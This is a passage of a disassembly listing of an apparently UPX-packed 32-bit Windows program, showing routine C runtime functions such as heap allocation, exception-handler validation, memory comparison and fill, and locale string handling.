and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_420519
call eax
jmp short loc_420519
; ---------------------------------------------------------------------------
loc_420512: ; DATA XREF: UPX0:stru_425990�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_420516: ; DATA XREF: UPX0:stru_425990�o
mov esp, [ebp+ms_exc.old_esp]
loc_420519: ; CODE XREF: sub_4204E5+27�j
; sub_4204E5+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_4204F8
; ---------------------------------------------------------------------------
loc_420523: ; CODE XREF: sub_4204E5+1A�j
call __SEH_epilog
retn
sub_4204E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420529 proc near ; CODE XREF: sub_41AA71+22�p
; sub_41AA71+3B�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004205DC SIZE 00000008 BYTES
push 10h
push offset stru_425EA8
call __SEH_prolog
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
mov [ebp+var_20], esi
test esi, esi
jnz short loc_420544
inc esi
loc_420544: ; CODE XREF: sub_420529+18�j
; sub_420529+9F�j
xor edi, edi
mov [ebp+var_1C], edi
cmp esi, 0FFFFFFE0h
ja short loc_4205B3
cmp ds:dword_47C774, 3
jnz short loc_42059E
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov ebx, [ebp+var_20]
cmp ebx, ds:dword_47C760
ja short loc_42059E
push 4
call sub_41D0E7
pop ecx
and [ebp+ms_exc.disabled], edi
push ebx
call sub_41D9AA
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4205D3
mov edi, [ebp+var_1C]
test edi, edi
jz short loc_4205A2
push [ebp+var_20]
push 0
push edi
call sub_420CC0
add esp, 0Ch
loc_42059E: ; CODE XREF: sub_420529+2C�j
; sub_420529+40�j
test edi, edi
jnz short loc_4205DC
loc_4205A2: ; CODE XREF: sub_420529+65�j
push esi
push 8
push ds:dword_47C770
call dword_424198 ; RtlAllocateHeap
mov edi, eax
loc_4205B3: ; CODE XREF: sub_420529+23�j
test edi, edi
jnz short loc_4205DC
cmp dword_44C040, edi
jz short loc_4205DC
push esi
call sub_41AC3E
pop ecx
test eax, eax
jnz loc_420544
jmp short loc_4205DE
sub_420529 endp
; =============== S U B R O U T I N E =======================================
sub_4205D0 proc near ; DATA XREF: UPX0:stru_425EA8�o
mov esi, [ebp+0Ch]
sub_4205D0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4205D3 proc near ; CODE XREF: sub_420529+5B�p
push 4
call sub_41D032
pop ecx
retn
sub_4205D3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_420529
loc_4205DC: ; CODE XREF: sub_420529+77�j
; sub_420529+8C�j ...
mov eax, edi
loc_4205DE: ; CODE XREF: sub_420529+A5�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_420529
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41AB1A
loc_4205E4: ; CODE XREF: sub_41AB1A+E�j
push 10h
push offset stru_425EB8
call __SEH_prolog
xor ebx, ebx
mov [ebp-1Ch], ebx
push 1
call sub_41D0E7
pop ecx
mov [ebp-4], ebx
push 3
pop edi
loc_420603: ; CODE XREF: sub_41AB1A+5B48�j
mov [ebp-20h], edi
cmp edi, ds:dword_47D780
jge short loc_420664
mov esi, edi
shl esi, 2
mov eax, ds:dword_47C778
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_420661
test byte ptr [eax+0Ch], 83h
jz short loc_420634
push eax
call sub_419E9A
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_420634
inc dword ptr [ebp-1Ch]
loc_420634: ; CODE XREF: sub_41AB1A+5B09�j
; sub_41AB1A+5B15�j
cmp edi, 14h
jl short loc_420661
mov eax, ds:dword_47C778
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_42417C ; RtlDeleteCriticalSection
mov eax, ds:dword_47C778
push dword ptr [esi+eax]
call sub_419DDD
pop ecx
mov eax, ds:dword_47C778
mov [esi+eax], ebx
loc_420661: ; CODE XREF: sub_41AB1A+5B03�j
; sub_41AB1A+5B1D�j
inc edi
jmp short loc_420603
; ---------------------------------------------------------------------------
loc_420664: ; CODE XREF: sub_41AB1A+5AF2�j
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_420676
mov eax, [ebp-1Ch]
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41AB1A
; =============== S U B R O U T I N E =======================================
sub_420676 proc near ; CODE XREF: sub_41AB1A+5B4E�p
; DATA XREF: UPX0:stru_425EB8�o
push 1
call sub_41D032
pop ecx
retn
sub_420676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42067F proc near ; CODE XREF: UPX0:0041AEBD�p
; sub_41FB3B+129�p
var_10 = byte ptr -10h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp dword_44C1CC, ebx
push esi
push edi
jnz short loc_4206FF
push offset aUser32_dll ; "user32.dll"
call dword_424104 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_42073A
mov esi, dword_424100
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_44C1CC, eax
jz short loc_42073A
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_44C1D0, eax
call esi ; GetProcAddress
cmp dword_44C048, 2
mov dword_44C1D4, eax
jnz short loc_4206FF
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_44C1DC, eax
jz short loc_4206FF
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
mov dword_44C1D8, eax
loc_4206FF: ; CODE XREF: sub_42067F+11�j
; sub_42067F+60�j ...
mov eax, dword_44C1D8
test eax, eax
jz short loc_420744
call eax
test eax, eax
jz short loc_42072B
lea ecx, [ebp+var_4]
push ecx
push 0Ch
lea ecx, [ebp+var_10]
push ecx
push 1
push eax
call dword_44C1DC
test eax, eax
jz short loc_42072B
test [ebp+var_8], 1
jnz short loc_420744
loc_42072B: ; CODE XREF: sub_42067F+8D�j
; sub_42067F+A4�j
cmp dword_44C054, 4
jb short loc_42073E
or [ebp+arg_A], 20h
jmp short loc_420763
; ---------------------------------------------------------------------------
loc_42073A: ; CODE XREF: sub_42067F+22�j
; sub_42067F+3D�j
xor eax, eax
jmp short loc_420773
; ---------------------------------------------------------------------------
loc_42073E: ; CODE XREF: sub_42067F+B3�j
or [ebp+arg_A], 4
jmp short loc_420763
; ---------------------------------------------------------------------------
loc_420744: ; CODE XREF: sub_42067F+87�j
; sub_42067F+AA�j
mov eax, dword_44C1D0
test eax, eax
jz short loc_420763
call eax
mov ebx, eax
test ebx, ebx
jz short loc_420763
mov eax, dword_44C1D4
test eax, eax
jz short loc_420763
push ebx
call eax
mov ebx, eax
loc_420763: ; CODE XREF: sub_42067F+B9�j
; sub_42067F+C3�j ...
push dword ptr [ebp+10h]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_44C1CC
loc_420773: ; CODE XREF: sub_42067F+BD�j
pop edi
pop esi
pop ebx
leave
retn
sub_42067F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420778 proc near ; CODE XREF: sub_41AF24+34�p
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, [esi+8]
test bl, 3
jnz short loc_4207A6
mov eax, large fs:18h
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
cmp ebx, ecx
mov [ebp+var_4], ecx
jb short loc_4207AD
cmp ebx, [eax+4]
jnb short loc_4207AD
loc_4207A6: ; CODE XREF: sub_420778+11�j
xor eax, eax
jmp loc_42099D
; ---------------------------------------------------------------------------
loc_4207AD: ; CODE XREF: sub_420778+27�j
; sub_420778+2C�j
push edi
mov edi, [esi+0Ch]
cmp edi, 0FFFFFFFFh
jnz short loc_4207BE
loc_4207B6: ; CODE XREF: sub_420778+139�j
; sub_420778+19C�j ...
xor eax, eax
inc eax
jmp loc_42099C
; ---------------------------------------------------------------------------
loc_4207BE: ; CODE XREF: sub_420778+3C�j
xor edx, edx
mov [ebp+arg_0], edx
mov eax, ebx
loc_4207C5: ; CODE XREF: sub_420778+6B�j
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_4207D4
cmp ecx, edx
jnb loc_420919
loc_4207D4: ; CODE XREF: sub_420778+52�j
cmp dword ptr [eax+4], 0
jz short loc_4207DD
inc [ebp+arg_0]
loc_4207DD: ; CODE XREF: sub_420778+60�j
inc edx
add eax, 0Ch
cmp edx, edi
jbe short loc_4207C5
cmp [ebp+arg_0], 0
jz short loc_4207FF
mov eax, [esi-8]
cmp eax, [ebp+var_4]
jb loc_420919
cmp eax, esi
jnb loc_420919
loc_4207FF: ; CODE XREF: sub_420778+71�j
mov eax, dword_44C1E0
mov edi, ebx
and edi, 0FFFFF000h
xor esi, esi
test eax, eax
jle short loc_420824
loc_420812: ; CODE XREF: sub_420778+AA�j
cmp dword_44C1E8[esi*4], edi
jz loc_42091D
inc esi
cmp esi, eax
jl short loc_420812
loc_420824: ; CODE XREF: sub_420778+98�j
push 1Ch
lea eax, [ebp+var_20]
push eax
push ebx
call dword_424188 ; VirtualQuery
test eax, eax
jz loc_420999
cmp [ebp+var_8], 1000000h
jnz loc_420999
test [ebp+var_C], 0CCh
jz short loc_4208A2
mov ecx, [ebp+var_1C]
cmp word ptr [ecx], 5A4Dh
jnz loc_420999
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz loc_420999
cmp word ptr [eax+18h], 10Bh
jnz loc_420999
sub ebx, ecx
cmp word ptr [eax+6], 0
movzx ecx, word ptr [eax+14h]
lea ecx, [ecx+eax+18h]
jbe loc_420999
mov eax, [ecx+0Ch]
cmp ebx, eax
jb short loc_4208A2
mov edx, [ecx+8]
add edx, eax
cmp ebx, edx
jnb short loc_4208A2
test byte ptr [ecx+27h], 80h
jnz short loc_420919
loc_4208A2: ; CODE XREF: sub_420778+D2�j
; sub_420778+119�j ...
push 1
push offset dword_44C228
call dword_424048 ; InterlockedExchange
test eax, eax
jnz loc_4207B6
mov ecx, dword_44C1E0
test ecx, ecx
mov edx, ecx
jle short loc_4208D6
lea eax, ds:44C1E4h[ecx*4]
loc_4208CA: ; CODE XREF: sub_420778+15C�j
cmp [eax], edi
jz short loc_4208D6
dec edx
sub eax, 4
test edx, edx
jg short loc_4208CA
loc_4208D6: ; CODE XREF: sub_420778+149�j
; sub_420778+154�j
test edx, edx
jnz short loc_420907
push 0Fh
pop ebx
cmp ecx, ebx
jg short loc_4208E3
mov ebx, ecx
loc_4208E3: ; CODE XREF: sub_420778+167�j
xor edx, edx
test ebx, ebx
jl short loc_4208FB
loc_4208E9: ; CODE XREF: sub_420778+181�j
lea eax, ds:44C1E8h[edx*4]
mov esi, [eax]
inc edx
cmp edx, ebx
mov [eax], edi
mov edi, esi
jle short loc_4208E9
loc_4208FB: ; CODE XREF: sub_420778+16F�j
cmp ecx, 10h
jge short loc_420907
inc ecx
mov dword_44C1E0, ecx
loc_420907: ; CODE XREF: sub_420778+160�j
; sub_420778+186�j
push 0
push offset dword_44C228
call dword_424048 ; InterlockedExchange
jmp loc_4207B6
; ---------------------------------------------------------------------------
loc_420919: ; CODE XREF: sub_420778+56�j
; sub_420778+79�j ...
xor eax, eax
jmp short loc_42099C
; ---------------------------------------------------------------------------
loc_42091D: ; CODE XREF: sub_420778+A1�j
test esi, esi
jle loc_4207B6
mov ebx, dword_424048
push 1
push offset dword_44C228
call ebx ; InterlockedExchange
test eax, eax
jnz loc_4207B6
cmp dword_44C1E8[esi*4], edi
jz short loc_420973
mov eax, dword_44C1E0
lea esi, [eax-1]
test esi, esi
jl short loc_420961
loc_420951: ; CODE XREF: sub_420778+1E3�j
cmp dword_44C1E8[esi*4], edi
jz short loc_42095D
dec esi
jns short loc_420951
loc_42095D: ; CODE XREF: sub_420778+1E0�j
test esi, esi
jge short loc_420971
loc_420961: ; CODE XREF: sub_420778+1D7�j
cmp eax, 10h
jge short loc_42096C
inc eax
mov dword_44C1E0, eax
loc_42096C: ; CODE XREF: sub_420778+1EC�j
lea esi, [eax-1]
jmp short loc_420973
; ---------------------------------------------------------------------------
loc_420971: ; CODE XREF: sub_420778+1E7�j
jz short loc_42098B
loc_420973: ; CODE XREF: sub_420778+1CB�j
; sub_420778+1F7�j
xor ecx, ecx
test esi, esi
jl short loc_42098B
loc_420979: ; CODE XREF: sub_420778+211�j
lea eax, ds:44C1E8h[ecx*4]
mov edx, [eax]
inc ecx
cmp ecx, esi
mov [eax], edi
mov edi, edx
jle short loc_420979
loc_42098B: ; CODE XREF: sub_420778:loc_420971�j
; sub_420778+1FF�j
push 0
push offset dword_44C228
call ebx ; InterlockedExchange
jmp loc_4207B6
; ---------------------------------------------------------------------------
loc_420999: ; CODE XREF: sub_420778+BB�j
; sub_420778+C8�j ...
or eax, 0FFFFFFFFh
loc_42099C: ; CODE XREF: sub_420778+41�j
; sub_420778+1A3�j
pop edi
loc_42099D: ; CODE XREF: sub_420778+30�j
pop esi
pop ebx
leave
retn
sub_420778 endp
; =============== S U B R O U T I N E =======================================
sub_4209A1 proc near ; CODE XREF: sub_41B13E+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_420B2F
push dword ptr [esi+4]
call sub_419DDD
push dword ptr [esi+8]
call sub_419DDD
push dword ptr [esi+0Ch]
call sub_419DDD
push dword ptr [esi+10h]
call sub_419DDD
push dword ptr [esi+14h]
call sub_419DDD
push dword ptr [esi+18h]
call sub_419DDD
push dword ptr [esi]
call sub_419DDD
push dword ptr [esi+20h]
call sub_419DDD
push dword ptr [esi+24h]
call sub_419DDD
push dword ptr [esi+28h]
call sub_419DDD
push dword ptr [esi+2Ch]
call sub_419DDD
push dword ptr [esi+30h]
call sub_419DDD
push dword ptr [esi+34h]
call sub_419DDD
push dword ptr [esi+1Ch]
call sub_419DDD
push dword ptr [esi+38h]
call sub_419DDD
push dword ptr [esi+3Ch]
call sub_419DDD
add esp, 40h
push dword ptr [esi+40h]
call sub_419DDD
push dword ptr [esi+44h]
call sub_419DDD
push dword ptr [esi+48h]
call sub_419DDD
push dword ptr [esi+4Ch]
call sub_419DDD
push dword ptr [esi+50h]
call sub_419DDD
push dword ptr [esi+54h]
call sub_419DDD
push dword ptr [esi+58h]
call sub_419DDD
push dword ptr [esi+5Ch]
call sub_419DDD
push dword ptr [esi+60h]
call sub_419DDD
push dword ptr [esi+64h]
call sub_419DDD
push dword ptr [esi+68h]
call sub_419DDD
push dword ptr [esi+6Ch]
call sub_419DDD
push dword ptr [esi+70h]
call sub_419DDD
push dword ptr [esi+74h]
call sub_419DDD
push dword ptr [esi+78h]
call sub_419DDD
push dword ptr [esi+7Ch]
call sub_419DDD
add esp, 40h
push dword ptr [esi+80h]
call sub_419DDD
push dword ptr [esi+84h]
call sub_419DDD
push dword ptr [esi+88h]
call sub_419DDD
push dword ptr [esi+8Ch]
call sub_419DDD
push dword ptr [esi+90h]
call sub_419DDD
push dword ptr [esi+94h]
call sub_419DDD
push dword ptr [esi+98h]
call sub_419DDD
push dword ptr [esi+9Ch]
call sub_419DDD
push dword ptr [esi+0A0h]
call sub_419DDD
push dword ptr [esi+0A4h]
call sub_419DDD
push dword ptr [esi+0A8h]
call sub_419DDD
add esp, 2Ch
loc_420B2F: ; CODE XREF: sub_4209A1+7�j
pop esi
retn
sub_4209A1 endp
; =============== S U B R O U T I N E =======================================
sub_420B31 proc near ; CODE XREF: sub_41B13E+5D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_420B8E
mov eax, [esi]
mov ecx, off_42AC04
cmp eax, [ecx]
jz short loc_420B55
cmp eax, off_42ABD4
jz short loc_420B55
push eax
call sub_419DDD
pop ecx
loc_420B55: ; CODE XREF: sub_420B31+13�j
; sub_420B31+1B�j
mov eax, [esi+4]
mov ecx, off_42AC04
cmp eax, [ecx+4]
jz short loc_420B72
cmp eax, off_42ABD8
jz short loc_420B72
push eax
call sub_419DDD
pop ecx
loc_420B72: ; CODE XREF: sub_420B31+30�j
; sub_420B31+38�j
mov esi, [esi+8]
mov eax, off_42AC04
cmp esi, [eax+8]
jz short loc_420B8E
cmp esi, off_42ABDC
jz short loc_420B8E
push esi
call sub_419DDD
pop ecx
loc_420B8E: ; CODE XREF: sub_420B31+7�j
; sub_420B31+4C�j ...
pop esi
retn
sub_420B31 endp
; =============== S U B R O U T I N E =======================================
sub_420B90 proc near ; CODE XREF: sub_41B13E+3A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_420C67
mov eax, [esi+0Ch]
mov ecx, off_42AC04
cmp eax, [ecx+0Ch]
jz short loc_420BBA
cmp eax, off_42ABE0
jz short loc_420BBA
push eax
call sub_419DDD
pop ecx
loc_420BBA: ; CODE XREF: sub_420B90+19�j
; sub_420B90+21�j
mov eax, [esi+10h]
mov ecx, off_42AC04
cmp eax, [ecx+10h]
jz short loc_420BD7
cmp eax, off_42ABE4
jz short loc_420BD7
push eax
call sub_419DDD
pop ecx
loc_420BD7: ; CODE XREF: sub_420B90+36�j
; sub_420B90+3E�j
mov eax, [esi+14h]
mov ecx, off_42AC04
cmp eax, [ecx+14h]
jz short loc_420BF4
cmp eax, off_42ABE8
jz short loc_420BF4
push eax
call sub_419DDD
pop ecx
loc_420BF4: ; CODE XREF: sub_420B90+53�j
; sub_420B90+5B�j
mov eax, [esi+18h]
mov ecx, off_42AC04
cmp eax, [ecx+18h]
jz short loc_420C11
cmp eax, off_42ABEC
jz short loc_420C11
push eax
call sub_419DDD
pop ecx
loc_420C11: ; CODE XREF: sub_420B90+70�j
; sub_420B90+78�j
mov eax, [esi+1Ch]
mov ecx, off_42AC04
cmp eax, [ecx+1Ch]
jz short loc_420C2E
cmp eax, off_42ABF0
jz short loc_420C2E
push eax
call sub_419DDD
pop ecx
loc_420C2E: ; CODE XREF: sub_420B90+8D�j
; sub_420B90+95�j
mov eax, [esi+20h]
mov ecx, off_42AC04
cmp eax, [ecx+20h]
jz short loc_420C4B
cmp eax, off_42ABF4
jz short loc_420C4B
push eax
call sub_419DDD
pop ecx
loc_420C4B: ; CODE XREF: sub_420B90+AA�j
; sub_420B90+B2�j
mov esi, [esi+24h]
mov eax, off_42AC04
cmp esi, [eax+24h]
jz short loc_420C67
cmp esi, off_42ABF8
jz short loc_420C67
push esi
call sub_419DDD
pop ecx
loc_420C67: ; CODE XREF: sub_420B90+7�j
; sub_420B90+C6�j ...
pop esi
retn
sub_420B90 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_420C84: ; CODE XREF: UPX0:00420C91�j
mov al, [edx]
or al, al
jz short loc_420C93
add edx, 1
bts [esp], eax
jmp short loc_420C84
; ---------------------------------------------------------------------------
loc_420C93: ; CODE XREF: UPX0:00420C88�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_420C9C: ; CODE XREF: UPX0:00420CAC�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_420CAE
add esi, 1
bt [esp], eax
jnb short loc_420C9C
loc_420CAE: ; CODE XREF: UPX0:00420CA3�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_420CC0 proc near ; CODE XREF: sub_41C18B+2EF�p
; sub_41C18B+325�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_420D1B
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_420D0B
neg ecx
and ecx, 3
jz short loc_420CED
sub edx, ecx
loc_420CE3: ; CODE XREF: sub_420CC0+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_420CE3
loc_420CED: ; CODE XREF: sub_420CC0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_420D0B
rep stosd
test edx, edx
jz short loc_420D15
loc_420D0B: ; CODE XREF: sub_420CC0+18�j
; sub_420CC0+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_420D0B
loc_420D15: ; CODE XREF: sub_420CC0+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_420D1B: ; CODE XREF: sub_420CC0+A�j
mov eax, [esp+arg_0]
retn
sub_420CC0 endp
; ---------------------------------------------------------------------------
mov eax, [esp+0Ch]
test eax, eax
jz short locret_420D72
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_420D73
test eax, 1
jz short loc_420D53
mov cl, [esi]
cmp cl, [edi]
jnz short loc_420DA0
add esi, 1
add edi, 1
sub eax, 1
jz short loc_420D70
loc_420D53: ; CODE XREF: UPX0:00420D40�j
; UPX0:00420D6E�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_420DA0
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_420DA0
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_420D53
loc_420D70: ; CODE XREF: UPX0:00420D51�j
; UPX0:00420DAA�j
pop edi
pop esi
locret_420D72: ; CODE XREF: UPX0:00420D26�j
retn
; ---------------------------------------------------------------------------
loc_420D73: ; CODE XREF: UPX0:00420D39�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_420DA8
repe cmpsd
jz short loc_420DA8
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_420D9B
cmp ch, dh
jnz short loc_420D9B
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_420D9B
cmp ch, dh
loc_420D9B: ; CODE XREF: UPX0:00420D89�j
; UPX0:00420D8D�j ...
mov eax, 0
loc_420DA0: ; CODE XREF: UPX0:00420D46�j
; UPX0:00420D59�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_420DA8: ; CODE XREF: UPX0:00420D7B�j
; UPX0:00420D7F�j
test eax, eax
jz short loc_420D70
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_420D9B
sub eax, 1
jz short loc_420DD5
cmp dh, ch
jnz short loc_420D9B
sub eax, 1
jz short loc_420DD5
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_420D9B
sub eax, 1
loc_420DD5: ; CODE XREF: UPX0:00420DB7�j
; UPX0:00420DC0�j
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420DD8 proc near ; CODE XREF: sub_41CEE8+60�p
; sub_421078+A1�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 1Ch
push offset stru_426018
call __SEH_prolog
xor esi, esi
cmp dword_44C25C, esi
jnz short loc_420E23
lea eax, [ebp+var_1C]
push eax
xor edi, edi
inc edi
push edi
push offset dword_42546C
push edi
call dword_424038 ; GetStringTypeW
test eax, eax
jz short loc_420E0E
mov dword_44C25C, edi
jmp short loc_420E23
; ---------------------------------------------------------------------------
loc_420E0E: ; CODE XREF: sub_420DD8+2C�j
call dword_42412C ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_420E23
mov dword_44C25C, 2
loc_420E23: ; CODE XREF: sub_420DD8+14�j
; sub_420DD8+34�j ...
mov eax, dword_44C25C
cmp eax, 2
jz loc_420F1B
cmp eax, esi
jz loc_420F1B
cmp eax, 1
jnz loc_420F41
mov [ebp+var_24], esi
mov [ebp+var_20], esi
cmp [ebp+arg_10], esi
jnz short loc_420E55
mov eax, dword_44C1C4
mov [ebp+arg_10], eax
loc_420E55: ; CODE XREF: sub_420DD8+73�j
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
xor eax, eax
cmp [ebp+arg_18], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call dword_4240FC ; MultiByteToWideChar
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jz loc_420F41
and [ebp+ms_exc.disabled], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_4192D0
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
mov [ebp+var_2C], esi
push ebx
push 0
push esi
call sub_420CC0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_420EC6
; ---------------------------------------------------------------------------
loc_420EB1: ; DATA XREF: UPX0:stru_426018�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_420EB5: ; DATA XREF: UPX0:stru_426018�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0A8
xor esi, esi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_420EC6: ; CODE XREF: sub_420DD8+D7�j
test esi, esi
jnz short loc_420EE1
push edi
push 2
call sub_420529
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_420F41
mov [ebp+var_20], 1
loc_420EE1: ; CODE XREF: sub_420DD8+F0�j
push edi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_4240FC ; MultiByteToWideChar
test eax, eax
jz short loc_420F09
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_424038 ; GetStringTypeW
mov [ebp+var_24], eax
loc_420F09: ; CODE XREF: sub_420DD8+11E�j
cmp [ebp+var_20], 0
jz short loc_420F16
push esi
call sub_419DDD
pop ecx
loc_420F16: ; CODE XREF: sub_420DD8+135�j
mov eax, [ebp+var_24]
jmp short loc_420F89
; ---------------------------------------------------------------------------
loc_420F1B: ; CODE XREF: sub_420DD8+53�j
; sub_420DD8+5B�j
mov ebx, [ebp+arg_14]
cmp ebx, esi
jnz short loc_420F28
mov ebx, dword_44C1B4
loc_420F28: ; CODE XREF: sub_420DD8+148�j
mov edi, [ebp+arg_10]
test edi, edi
jnz short loc_420F35
mov edi, dword_44C1C4
loc_420F35: ; CODE XREF: sub_420DD8+155�j
push ebx
call sub_4218B5
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_420F45
loc_420F41: ; CODE XREF: sub_420DD8+64�j
; sub_420DD8+A5�j ...
xor eax, eax
jmp short loc_420F89
; ---------------------------------------------------------------------------
loc_420F45: ; CODE XREF: sub_420DD8+167�j
cmp eax, edi
jz short loc_420F67
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push edi
call sub_4218F8
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_420F41
mov [ebp+arg_4], esi
loc_420F67: ; CODE XREF: sub_420DD8+16F�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_42403C ; GetStringTypeA
mov edi, eax
test esi, esi
jz short loc_420F87
push esi
call sub_419DDD
pop ecx
loc_420F87: ; CODE XREF: sub_420DD8+1A6�j
mov eax, edi
loc_420F89: ; CODE XREF: sub_420DD8+141�j
; sub_420DD8+16B�j
lea esp, [ebp-38h]
call __SEH_epilog
retn
sub_420DD8 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
jecxz short loc_420FD2
mov ebx, ecx
mov edi, [ebp+8]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+0Ch]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_420FD0
jz short loc_420FD2
sub ecx, 2
loc_420FD0: ; CODE XREF: UPX0:00420FC9�j
not ecx
loc_420FD2: ; CODE XREF: UPX0:00420FA9�j
; UPX0:00420FCB�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
